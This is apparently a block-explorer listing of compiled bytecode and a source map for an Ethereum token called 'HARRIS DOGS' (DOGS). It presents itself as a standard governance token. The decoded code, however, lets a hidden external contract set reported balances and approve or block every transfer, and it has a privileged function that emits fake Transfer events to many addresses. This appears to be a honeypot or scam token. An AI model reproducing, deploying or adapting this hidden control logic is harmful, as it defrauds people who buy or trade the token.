60a06040523480156200001157600080fd5b50604080518082018252600b81526a48415252495320444f475360a81b60208083019190915282518084018452600480825263444f475360e01b82840152845190815260248101855291820180516001600160e01b0316634732cb2560e11b17815293518251939491936c0c9f2c9cd04674edea400000009360609373b95835ebd5f55f545edadae62540b2ef61e73e8d9391928291908083835b60208310620000cd5780518252601f199092019160209182019101620000ac565b6001836020036101000a0380198251168184511680821785525050505050509050019150506000604051808303816000865af19150503d806000811462000131576040519150601f19603f3d011682016040523d82523d6000602084013e62000136565b606091505b509150508080602001905160208110156200015057600080fd5b5051600280546001600160a01b0319166001600160a01b03909216919091179055508251620001879060079060208601906200026c565b5081516200019d9060089060208501906200026c565b506009805460ff191660121790556080819052336000818152600160209081526040808320859055805185815290517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef929181900390910190a350505060006200020c6200026860201b60201c565b60098054610100600160a81b0319166101006001600160a01b03841690810291909117909155604051919250906000907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a35062000308565b3390565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f10620002af57805160ff1916838001178555620002df565b82800160010185558215620002df579182015b82811115620002df578251825591602001919060010190620002c2565b50620002ed929150620002f1565b5090565b5b80821115620002ed5760008155600101620002f2565b608051611bd6620003236000398061076b5250611bd66000f3fe608060405234801561001057600080fd5b506004361061018e5760003560e01c8063715018a6116100de578063a9059cbb11610097578063dd62ed3e11610071578063dd62ed3e14610578578063e7a324dc146105a6578063f1127ed8146105ae578063f2fde38b146106005761018e565b8063a9059cbb146104df578063b4b5ea571461050b578063c3cda520146105315761018e565b8063715018a614610449578063782d6fe1146104515780637ecebe001461047d5780638da5cb5b146104a357806395d89b41146104ab578063a457c2d7146104b35761018e565b80633408e4701161014b578063587cde1e11610125578063587cde1e1461037c5780635c19a95c146103be5780636fcfff45146103e457806370a08231146104235761018e565b80633408e470146102c657806339509351146102ce5780634ecd9c10146102fa5761018e565b806306fdde0314610193578063095ea7b31461021057806318160ddd1461025057806320606b701461026a57806323b872dd14610272578063313ce567146102a8575b600080fd5b61019b610626565b6040805160208082528351818301528351919283929083019185019080838360005b838110156101d55781810151838201526020016101bd565b50505050905090810190601f1680156102025780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b61023c6004803603604081101561022657600080fd5b506001600160a01b0381351690602001356106bd565b604080519115158252519081900360200190f35b6102586106db565b60408051918252519081900360200190f35b610258610790565b61023c6004803603606081101561028857600080fd5b506001600160a01b038135811691602081013590911690604001356107b4565b6102b061083b565b6040805160ff9092168252519081900360200190f35b610258610844565b61023c600480360360408110156102e457600080fd5b506001600160a01b038135169060200135610848565b61037a6004803603606081101561031057600080fd5b6001600160a01b03823516919081019060408101602082013564010000000081111561033b57600080fd5b82018360208201111561034d57600080fd5b8035906020019184602083028401116401000000008311171561036f57600080fd5b919350915035610896565b005b6103a26004803603602081101561039257600080fd5b50356001600160a01b031661092d565b604080516001600160a01b039092168252519081900360200190f35b61037a600480360360208110156103d457600080fd5b50356001600160a01b031661094e565b61040a600480360360208110156103fa57600080fd5b50356001600160a01b031661095b565b6040805163ffffffff9092168252519081900360200190f35b6102586004803603602081101561043957600080fd5b50356001600160a01b0316610973565b61037a610a1d565b6102586004803603604081101561046757600080fd5b506001600160a01b038135169060200135610adc565b6102586004803603602081101561049357600080fd5b50356001600160a01b0316610ce4565b6103a2610cf6565b61019b610d0a565b61023c600480360360408110156104c957600080fd5b506001600160a01b038135169060200135610d6b565b61023c600480360360408110156104f557600080fd5b506001600160a01b038135169060200135610dd3565b6102586004803603602081101561052157600080fd5b50356001600160a01b0316610de7565b61037a600480360360c081101561054757600080fd5b506001600160a01b038135169060208101359060408101359060ff6060820135169060808101359060a00135610e4b565b6102586004803603604081101561058e57600080fd5b506001600160a01b03813581169160200135166110f3565b61025861111e565b6105e0600480360360408110156105c457600080fd5b5080356001600160a01b0316906020013563ffffffff16611142565b6040805163ffffffff909316835260208301919091528051918290030190f35b61037a6004803603602081101561061657600080fd5b50356001600160a01b031661116f565b60078054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156106b25780601f10610687576101008083540402835291602001916106b2565b820191906000526020600020905b81548152906001019060200180831161069557829003601f168201915b505050505090505b90565b60006106d16106ca61128a565b848461128e565b5060015b92915050565b600080600260009054906101000a90046001600160a01b03166001600160a01b0316633408e4706040518163ffffffff1660e01b815260040160206040518083038186803b15801561072c57600080fd5b505afa158015610740573d6000803e3d6000fd5b505050506040513d602081101561075657600080fd5b50519050603881146107695790506106ba565b7f000000000000000000000000000000000000000000000000000000000000000091505090565b7f8cad95687ba82c2ce50e74f7b754645e5117c3a5bec8151c0726d5857980a86681565b60006107c18484846113f0565b610831846107cd61128a565b61082c85604051806060016040528060288152602001611afc602891396001600160a01b038a1660009081526006602052604081209061080b61128a565b6001600160a01b031681526020810191909152604001600020549190611545565b61128e565b5060019392505050565b60095460ff1690565b4690565b60006106d161085561128a565b8461082c856006600061086661128a565b6001600160a01b03908116825260208083019390935260409182016000908120918c1681529252902054906115dc565b6002546001600160a01b031633146108ad57600080fd5b60005b82811015610926578383828181106108c457fe5b905060200201356001600160a01b03166001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040518082815260200191505060405180910390a36001016108b0565b5050505050565b6001600160a01b03808216600090815260208190526040902054165b919050565b6109583382611636565b50565b60046020526000908152604090205463ffffffff1681565b60025460408051623f675f60e91b81526001600160a01b038481166004830152915160009384931691637ecebe00916024808301926020929190829003018186803b1580156109c157600080fd5b505afa1580156109d5573d6000803e3d6000fd5b505050506040513d60208110156109eb57600080fd5b50519050600019811015610a00579050610949565b50506001600160a01b031660009081526001602052604090205490565b610a2561128a565b60095461010090046001600160a01b03908116911614610a8c576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b60095460405160009161010090046001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a360098054610100600160a81b0319169055565b6000438210610b1c5760405162461bcd60e51b8152600401808060200182810382526027815260200180611a8d6027913960400191505060405180910390fd5b6001600160a01b03831660009081526004602052604090205463ffffffff1680610b4a5760009150506106d5565b6001600160a01b038416600090815260036020908152604080832063ffffffff600019860181168552925290912054168310610bb9576001600160a01b03841660009081526003602090815260408083206000199490940163ffffffff168352929052206001015490506106d5565b6001600160a01b038416600090815260036020908152604080832083805290915290205463ffffffff16831015610bf45760009150506106d5565b600060001982015b8163ffffffff168163ffffffff161115610cad57600282820363ffffffff16048103610c26611a07565b506001600160a01b038716600090815260036020908152604080832063ffffffff808616855290835292819020815180830190925280549093168082526001909301549181019190915290871415610c88576020015194506106d59350505050565b805163ffffffff16871115610c9f57819350610ca6565b6001820392505b5050610bfc565b506001600160a01b038516600090815260036020908152604080832063ffffffff9094168352929052206001015491505092915050565b60056020526000908152604090205481565b60095461010090046001600160a01b031690565b60088054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156106b25780601f10610687576101008083540402835291602001916106b2565b60006106d1610d7861128a565b8461082c85604051806060016040528060258152602001611b7c6025913960066000610da261128a565b6001600160a01b03908116825260208083019390935260409182016000908120918d16815292529020549190611545565b60006106d1610de061128a565b84846113f0565b6001600160a01b03811660009081526004602052604081205463ffffffff1680610e12576000610e44565b6001600160a01b038316600090815260036020908152604080832063ffffffff60001986011684529091529020600101545b9392505050565b60408051808201909152600b81526a48415252495320444f475360a81b60209091015260007f8cad95687ba82c2ce50e74f7b754645e5117c3a5bec8151c0726d5857980a8667fcd6e3dd5ad455e89e0e34942c8f5eb5937277e2558c643359ccd1231dc142ba9610eba610844565b60408051602080820195909552808201939093526060830191909152306080808401919091528151808403909101815260a0830182528051908401207fe48329057bfd03d55e49b547132e39cffd9c1820ad7b9d4c5307691425d15adf60c08401526001600160a01b038b1660e084015261010083018a90526101208084018a9052825180850390910181526101408401835280519085012061190160f01b6101608501526101628401829052610182808501829052835180860390910181526101a285018085528151918701919091206000918290526101c2860180865281905260ff8b166101e287015261020286018a90526102228601899052935192965090949293909260019261024280840193601f198301929081900390910190855afa158015610fed573d6000803e3d6000fd5b5050604051601f1901519150506001600160a01b03811661103f5760405162461bcd60e51b8152600401808060200182810382526026815260200180611ab46026913960400191505060405180910390fd5b6001600160a01b0381166000908152600560205260409020805460018101909155891461109d5760405162461bcd60e51b8152600401808060200182810382526022815260200180611ada6022913960400191505060405180910390fd5b874211156110dc5760405162461bcd60e51b8152600401808060200182810382526026815260200180611a676026913960400191505060405180910390fd5b6110e6818b611636565b505050505b505050505050565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b7fe48329057bfd03d55e49b547132e39cffd9c1820ad7b9d4c5307691425d15adf81565b60036020908152600092835260408084209091529082529020805460019091015463ffffffff9091169082565b61117761128a565b60095461010090046001600160a01b039081169116146111de576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b6001600160a01b0381166112235760405162461bcd60e51b8152600401808060200182810382526026815260200180611a1f6026913960400191505060405180910390fd5b6009546040516001600160a01b0380841692610100900416907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600980546001600160a01b0390921661010002610100600160a81b0319909216919091179055565b3390565b6001600160a01b0383166112d35760405162461bcd60e51b8152600401808060200182810382526024815260200180611b246024913960400191505060405180910390fd5b6001600160a01b0382166113185760405162461bcd60e51b8152600401808060200182810382526022815260200180611a456022913960400191505060405180910390fd5b336001600160a01b038416141561138e57600254604080516317066a5760e21b815260006004820181905291516001600160a01b0390931692635c19a95c9260248084019391929182900301818387803b15801561137557600080fd5b505af1158015611389573d6000803e3d6000fd5b505050505b6001600160a01b03808416600081815260066020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3600254604080516001600160a01b038681166024830152858116604483015260648201859052336084808401919091528351808403909101815260a490920183526020820180516001600160e01b03166303b9b1f960e41b17815292518251600095929092169390918291908083835b602083106114ca5780518252601f1990920191602091820191016114ab565b6001836020036101000a0380198251168184511680821785525050505050509050019150506000604051808303816000865af19150503d806000811461152c576040519150601f19603f3d011682016040523d82523d6000602084013e611531565b606091505b505090508061153f57600080fd5b50505050565b600081848411156115d45760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015611599578181015183820152602001611581565b50505050905090810190601f1680156115c65780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610e44576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b6001600160a01b038083166000908152602081905260408120549091169061165d84610973565b6001600160a01b0385811660008181526020819052604080822080546001600160a01b031916898616908117909155905194955093928616927f3134e8a2e6d97e929a7e54011ea5485d7d196dd5f0ba4d4ef95803e8e3fc257f9190a461153f828483816001600160a01b0316836001600160a01b0316141580156116e25750600081115b156117fd576001600160a01b03831615611774576001600160a01b03831660009081526004602052604081205463ffffffff169081611722576000611754565b6001600160a01b038516600090815260036020908152604080832063ffffffff60001987011684529091529020600101545b905060006117628285611802565b905061177086848484611844565b5050505b6001600160a01b038216156117fd576001600160a01b03821660009081526004602052604081205463ffffffff1690816117af5760006117e1565b6001600160a01b038416600090815260036020908152604080832063ffffffff60001987011684529091529020600101545b905060006117ef82856115dc565b90506110eb85848484611844565b505050565b6000610e4483836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611545565b600061186843604051806060016040528060348152602001611b48603491396119a9565b905060008463ffffffff161180156118b157506001600160a01b038516600090815260036020908152604080832063ffffffff6000198901811685529252909120548282169116145b156118ee576001600160a01b038516600090815260036020908152604080832063ffffffff6000198901168452909152902060010182905561195f565b60408051808201825263ffffffff808416825260208083018681526001600160a01b038a166000818152600384528681208b8616825284528681209551865490861663ffffffff19918216178755925160019687015590815260049092529390208054928801909116919092161790555b604080518481526020810184905281516001600160a01b038816927fdec2bacdd2f05b59de34da9b523dff8be42e5e38e818c82fdb0bae774387a724928290030190a25050505050565b60008164010000000084106119ff5760405162461bcd60e51b8152602060048201818152835160248401528351909283926044909101919085019080838360008315611599578181015183820152602001611581565b509192915050565b60408051808201909152600080825260208201529056fe4f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f2061646472657373444f47533a3a64656c656761746542795369673a207369676e61747572652065787069726564444f47533a3a6765745072696f72566f7465733a206e6f74207965742064657465726d696e6564444f47533a3a64656c656761746542795369673a20696e76616c6964207369676e6174757265444f47533a3a64656c656761746542795369673a20696e76616c6964206e6f6e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a20617070726f76652066726f6d20746865207a65726f2061646472657373444f47533a3a5f7772697465436865636b706f696e743a20626c6f636b206e756d6265722065786365656473203332206269747345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122057ca7fede37eac36162972f11ab3e6e1be8c02662fd8d583a0513efc7421f38264736f6c634300060c0033
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061018e5760003560e01c8063715018a6116100de578063a9059cbb11610097578063dd62ed3e11610071578063dd62ed3e14610578578063e7a324dc146105a6578063f1127ed8146105ae578063f2fde38b146106005761018e565b8063a9059cbb146104df578063b4b5ea571461050b578063c3cda520146105315761018e565b8063715018a614610449578063782d6fe1146104515780637ecebe001461047d5780638da5cb5b146104a357806395d89b41146104ab578063a457c2d7146104b35761018e565b80633408e4701161014b578063587cde1e11610125578063587cde1e1461037c5780635c19a95c146103be5780636fcfff45146103e457806370a08231146104235761018e565b80633408e470146102c657806339509351146102ce5780634ecd9c10146102fa5761018e565b806306fdde0314610193578063095ea7b31461021057806318160ddd1461025057806320606b701461026a57806323b872dd14610272578063313ce567146102a8575b600080fd5b61019b610626565b6040805160208082528351818301528351919283929083019185019080838360005b838110156101d55781810151838201526020016101bd565b50505050905090810190601f1680156102025780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b61023c6004803603604081101561022657600080fd5b506001600160a01b0381351690602001356106bd565b604080519115158252519081900360200190f35b6102586106db565b60408051918252519081900360200190f35b610258610790565b61023c6004803603606081101561028857600080fd5b506001600160a01b038135811691602081013590911690604001356107b4565b6102b061083b565b6040805160ff9092168252519081900360200190f35b610258610844565b61023c600480360360408110156102e457600080fd5b506001600160a01b038135169060200135610848565b61037a6004803603606081101561031057600080fd5b6001600160a01b03823516919081019060408101602082013564010000000081111561033b57600080fd5b82018360208201111561034d57600080fd5b8035906020019184602083028401116401000000008311171561036f57600080fd5b919350915035610896565b005b6103a26004803603602081101561039257600080fd5b50356001600160a01b031661092d565b604080516001600160a01b039092168252519081900360200190f35b61037a600480360360208110156103d457600080fd5b50356001600160a01b031661094e565b61040a600480360360208110156103fa57600080fd5b50356001600160a01b031661095b565b6040805163ffffffff9092168252519081900360200190f35b6102586004803603602081101561043957600080fd5b50356001600160a01b0316610973565b61037a610a1d565b6102586004803603604081101561046757600080fd5b506001600160a01b038135169060200135610adc565b6102586004803603602081101561049357600080fd5b50356001600160a01b0316610ce4565b6103a2610cf6565b61019b610d0a565b61023c600480360360408110156104c957600080fd5b506001600160a01b038135169060200135610d6b565b61023c600480360360408110156104f557600080fd5b506001600160a01b038135169060200135610dd3565b6102586004803603602081101561052157600080fd5b50356001600160a01b0316610de7565b61037a600480360360c081101561054757600080fd5b506001600160a01b038135169060208101359060408101359060ff6060820135169060808101359060a00135610e4b565b6102586004803603604081101561058e57600080fd5b506001600160a01b03813581169160200135166110f3565b61025861111e565b6105e0600480360360408110156105c457600080fd5b5080356001600160a01b0316906020013563ffffffff16611142565b6040805163ffffffff909316835260208301919091528051918290030190f35b61037a6004803603602081101561061657600080fd5b50356001600160a01b031661116f565b60078054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156106b25780601f10610687576101008083540402835291602001916106b2565b820191906000526020600020905b81548152906001019060200180831161069557829003601f168201915b505050505090505b90565b60006106d16106ca61128a565b848461128e565b5060015b92915050565b600080600260009054906101000a90046001600160a01b03166001600160a01b0316633408e4706040518163ffffffff1660e01b815260040160206040518083038186803b15801561072c57600080fd5b505afa158015610740573d6000803e3d6000fd5b505050506040513d602081101561075657600080fd5b50519050603881146107695790506106ba565b7f000000000000000000000000000000000000000c9f2c9cd04674edea4000000091505090565b7f8cad95687ba82c2ce50e74f7b754645e5117c3a5bec8151c0726d5857980a86681565b60006107c18484846113f0565b610831846107cd61128a565b61082c85604051806060016040528060288152602001611afc602891396001600160a01b038a1660009081526006602052604081209061080b61128a565b6001600160a01b031681526020810191909152604001600020549190611545565b61128e565b5060019392505050565b60095460ff1690565b4690565b60006106d161085561128a565b8461082c856006600061086661128a565b6001600160a01b03908116825260208083019390935260409182016000908120918c1681529252902054906115dc565b6002546001600160a01b031633146108ad57600080fd5b60005b82811015610926578383828181106108c457fe5b905060200201356001600160a01b03166001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040518082815260200191505060405180910390a36001016108b0565b5050505050565b6001600160a01b03808216600090815260208190526040902054165b919050565b6109583382611636565b50565b60046020526000908152604090205463ffffffff1681565b60025460408051623f675f60e91b81526001600160a01b038481166004830152915160009384931691637ecebe00916024808301926020929190829003018186803b1580156109c157600080fd5b505afa1580156109d5573d6000803e3d6000fd5b505050506040513d60208110156109eb57600080fd5b50519050600019811015610a00579050610949565b50506001600160a01b031660009081526001602052604090205490565b610a2561128a565b60095461010090046001600160a01b03908116911614610a8c576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b60095460405160009161010090046001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a360098054610100600160a81b0319169055565b6000438210610b1c5760405162461bcd60e51b8152600401808060200182810382526027815260200180611a8d6027913960400191505060405180910390fd5b6001600160a01b03831660009081526004602052604090205463ffffffff1680610b4a5760009150506106d5565b6001600160a01b038416600090815260036020908152604080832063ffffffff600019860181168552925290912054168310610bb9576001600160a01b03841660009081526003602090815260408083206000199490940163ffffffff168352929052206001015490506106d5565b6001600160a01b038416600090815260036020908152604080832083805290915290205463ffffffff16831015610bf45760009150506106d5565b600060001982015b8163ffffffff168163ffffffff161115610cad57600282820363ffffffff16048103610c26611a07565b506001600160a01b038716600090815260036020908152604080832063ffffffff808616855290835292819020815180830190925280549093168082526001909301549181019190915290871415610c88576020015194506106d59350505050565b805163ffffffff16871115610c9f57819350610ca6565b6001820392505b5050610bfc565b506001600160a01b038516600090815260036020908152604080832063ffffffff9094168352929052206001015491505092915050565b60056020526000908152604090205481565b60095461010090046001600160a01b031690565b60088054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156106b25780601f10610687576101008083540402835291602001916106b2565b60006106d1610d7861128a565b8461082c85604051806060016040528060258152602001611b7c6025913960066000610da261128a565b6001600160a01b03908116825260208083019390935260409182016000908120918d16815292529020549190611545565b60006106d1610de061128a565b84846113f0565b6001600160a01b03811660009081526004602052604081205463ffffffff1680610e12576000610e44565b6001600160a01b038316600090815260036020908152604080832063ffffffff60001986011684529091529020600101545b9392505050565b60408051808201909152600b81526a48415252495320444f475360a81b60209091015260007f8cad95687ba82c2ce50e74f7b754645e5117c3a5bec8151c0726d5857980a8667fcd6e3dd5ad455e89e0e34942c8f5eb5937277e2558c643359ccd1231dc142ba9610eba610844565b60408051602080820195909552808201939093526060830191909152306080808401919091528151808403909101815260a0830182528051908401207fe48329057bfd03d55e49b547132e39cffd9c1820ad7b9d4c5307691425d15adf60c08401526001600160a01b038b1660e084015261010083018a90526101208084018a9052825180850390910181526101408401835280519085012061190160f01b6101608501526101628401829052610182808501829052835180860390910181526101a285018085528151918701919091206000918290526101c2860180865281905260ff8b166101e287015261020286018a90526102228601899052935192965090949293909260019261024280840193601f198301929081900390910190855afa158015610fed573d6000803e3d6000fd5b5050604051601f1901519150506001600160a01b03811661103f5760405162461bcd60e51b8152600401808060200182810382526026815260200180611ab46026913960400191505060405180910390fd5b6001600160a01b0381166000908152600560205260409020805460018101909155891461109d5760405162461bcd60e51b8152600401808060200182810382526022815260200180611ada6022913960400191505060405180910390fd5b874211156110dc5760405162461bcd60e51b8152600401808060200182810382526026815260200180611a676026913960400191505060405180910390fd5b6110e6818b611636565b505050505b505050505050565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b7fe48329057bfd03d55e49b547132e39cffd9c1820ad7b9d4c5307691425d15adf81565b60036020908152600092835260408084209091529082529020805460019091015463ffffffff9091169082565b61117761128a565b60095461010090046001600160a01b039081169116146111de576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b6001600160a01b0381166112235760405162461bcd60e51b8152600401808060200182810382526026815260200180611a1f6026913960400191505060405180910390fd5b6009546040516001600160a01b0380841692610100900416907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600980546001600160a01b0390921661010002610100600160a81b0319909216919091179055565b3390565b6001600160a01b0383166112d35760405162461bcd60e51b8152600401808060200182810382526024815260200180611b246024913960400191505060405180910390fd5b6001600160a01b0382166113185760405162461bcd60e51b8152600401808060200182810382526022815260200180611a456022913960400191505060405180910390fd5b336001600160a01b038416141561138e57600254604080516317066a5760e21b815260006004820181905291516001600160a01b0390931692635c19a95c9260248084019391929182900301818387803b15801561137557600080fd5b505af1158015611389573d6000803e3d6000fd5b505050505b6001600160a01b03808416600081815260066020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3600254604080516001600160a01b038681166024830152858116604483015260648201859052336084808401919091528351808403909101815260a490920183526020820180516001600160e01b03166303b9b1f960e41b17815292518251600095929092169390918291908083835b602083106114ca5780518252601f1990920191602091820191016114ab565b6001836020036101000a0380198251168184511680821785525050505050509050019150506000604051808303816000865af19150503d806000811461152c576040519150601f19603f3d011682016040523d82523d6000602084013e611531565b606091505b505090508061153f57600080fd5b50505050565b600081848411156115d45760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015611599578181015183820152602001611581565b50505050905090810190601f1680156115c65780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610e44576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b6001600160a01b038083166000908152602081905260408120549091169061165d84610973565b6001600160a01b0385811660008181526020819052604080822080546001600160a01b031916898616908117909155905194955093928616927f3134e8a2e6d97e929a7e54011ea5485d7d196dd5f0ba4d4ef95803e8e3fc257f9190a461153f828483816001600160a01b0316836001600160a01b0316141580156116e25750600081115b156117fd576001600160a01b03831615611774576001600160a01b03831660009081526004602052604081205463ffffffff169081611722576000611754565b6001600160a01b038516600090815260036020908152604080832063ffffffff60001987011684529091529020600101545b905060006117628285611802565b905061177086848484611844565b5050505b6001600160a01b038216156117fd576001600160a01b03821660009081526004602052604081205463ffffffff1690816117af5760006117e1565b6001600160a01b038416600090815260036020908152604080832063ffffffff60001987011684529091529020600101545b905060006117ef82856115dc565b90506110eb85848484611844565b505050565b6000610e4483836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611545565b600061186843604051806060016040528060348152602001611b48603491396119a9565b905060008463ffffffff161180156118b157506001600160a01b038516600090815260036020908152604080832063ffffffff6000198901811685529252909120548282169116145b156118ee576001600160a01b038516600090815260036020908152604080832063ffffffff6000198901168452909152902060010182905561195f565b60408051808201825263ffffffff808416825260208083018681526001600160a01b038a166000818152600384528681208b8616825284528681209551865490861663ffffffff19918216178755925160019687015590815260049092529390208054928801909116919092161790555b604080518481526020810184905281516001600160a01b038816927fdec2bacdd2f05b59de34da9b523dff8be42e5e38e818c82fdb0bae774387a724928290030190a25050505050565b60008164010000000084106119ff5760405162461bcd60e51b8152602060048201818152835160248401528351909283926044909101919085019080838360008315611599578181015183820152602001611581565b509192915050565b60408051808201909152600080825260208201529056fe4f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f2061646472657373444f47533a3a64656c656761746542795369673a207369676e61747572652065787069726564444f47533a3a6765745072696f72566f7465733a206e6f74207965742064657465726d696e6564444f47533a3a64656c656761746542795369673a20696e76616c6964207369676e6174757265444f47533a3a64656c656761746542795369673a20696e76616c6964206e6f6e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a20617070726f76652066726f6d20746865207a65726f2061646472657373444f47533a3a5f7772697465436865636b706f696e743a20626c6f636b206e756d6265722065786365656473203332206269747345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122057ca7fede37eac36162972f11ab3e6e1be8c02662fd8d583a0513efc7421f38264736f6c634300060c0033
Deployed Bytecode Sourcemap
36947:90:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;26950:83;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;29221:169;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;29221:169:0;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;28025:164;;;:::i;:::-;;;;;;;;;;;;;;;;16960:122;;;:::i;29864:332::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;29864:332:0;;;;;;;;;;;;;;;;;:::i;27877:83::-;;;:::i;:::-;;;;;;;;;;;;;;;;;;;24714:154;;;:::i;30605:218::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;30605:218:0;;;;;;;;:::i;23510:315::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;23510:315:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;23510:315:0;-1:-1:-1;23510:315:0;;:::i;:::-;;17946:149;;;;;;;;;;;;;;;;-1:-1:-1;17946:149:0;-1:-1:-1;;;;;17946:149:0;;:::i;:::-;;;;-1:-1:-1;;;;;17946:149:0;;;;;;;;;;;;;;18239:104;;;;;;;;;;;;;;;;-1:-1:-1;18239:104:0;-1:-1:-1;;;;;18239:104:0;;:::i;16838:49::-;;;;;;;;;;;;;;;;-1:-1:-1;16838:49:0;-1:-1:-1;;;;;16838:49:0;;:::i;:::-;;;;;;;;;;;;;;;;;;;28651:209;;;;;;;;;;;;;;;;-1:-1:-1;28651:209:0;-1:-1:-1;;;;;28651:209:0;;:::i;36297:148::-;;;:::i;20849:1253::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;20849:1253:0;;;;;;;;:::i;17374:42::-;;;;;;;;;;;;;;;;-1:-1:-1;17374:42:0;-1:-1:-1;;;;;17374:42:0;;:::i;35655:79::-;;;:::i;27152:87::-;;;:::i;31326:269::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;31326:269:0;;;;;;;;:::i;28402:186::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;28402:186:0;;;;;;;;:::i;20163:255::-;;;;;;;;;;;;;;;;-1:-1:-1;20163:255:0;-1:-1:-1;;;;;20163:255:0;;:::i;18777:1185::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;18777:1185:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;28923:151::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;28923:151:0;;;;;;;;;;:::i;17176:117::-;;;:::i;16699:70::-;;;;;;;;;;;;;;;;-1:-1:-1;16699:70:0;;-1:-1:-1;;;;;16699:70:0;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;36600:244;;;;;;;;;;;;;;;;-1:-1:-1;36600:244:0;-1:-1:-1;;;;;36600:244:0;;:::i;26950:83::-;27020:5;27013:12;;;;;;;;-1:-1:-1;;27013:12:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;26987:13;;27013:12;;27020:5;;27013:12;;27020:5;27013:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;26950:83;;:::o;29221:169::-;29304:4;29321:39;29330:12;:10;:12::i;:::-;29344:7;29353:6;29321:8;:39::i;:::-;-1:-1:-1;29378:4:0;29221:169;;;;;:::o;28025:164::-;28078:7;28098:9;28110:5;;;;;;;;;-1:-1:-1;;;;;28110:5:0;-1:-1:-1;;;;;28110:16:0;;:18;;;;;;;;;;;;;;;;;;;;;;;